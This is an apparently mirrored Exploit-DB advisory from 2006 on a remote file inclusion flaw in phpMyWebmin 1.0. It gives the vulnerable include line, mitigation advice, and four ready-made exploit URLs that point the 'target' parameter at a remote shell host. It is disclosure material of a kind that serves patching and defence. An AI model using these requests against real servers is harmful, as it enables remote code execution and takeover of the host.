phpMyWebmin 1.0 - exploit.company

vendor:

phpMyWebmin

by:

XORON

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: phpMyWebmin

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:phpmywebmin:phpmywebmin:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'target' parameter in 'change_preferences2.php', 'create_file.php', 'upload_local.php' and 'upload_multi.php' scripts. A remote attacker can include a file from a remote server and execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of phpMyWebmin or apply the patch from the vendor.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vuln. Code: include("$target/$folder/preferences.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit: /change_preferences2.php?target=http://SH3LL?
         /create_file.php?target=http://SH3LL?
         /upload_local.php?target=http://SH3LL?
         /upload_multi.php?target=http://SH3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-09-30]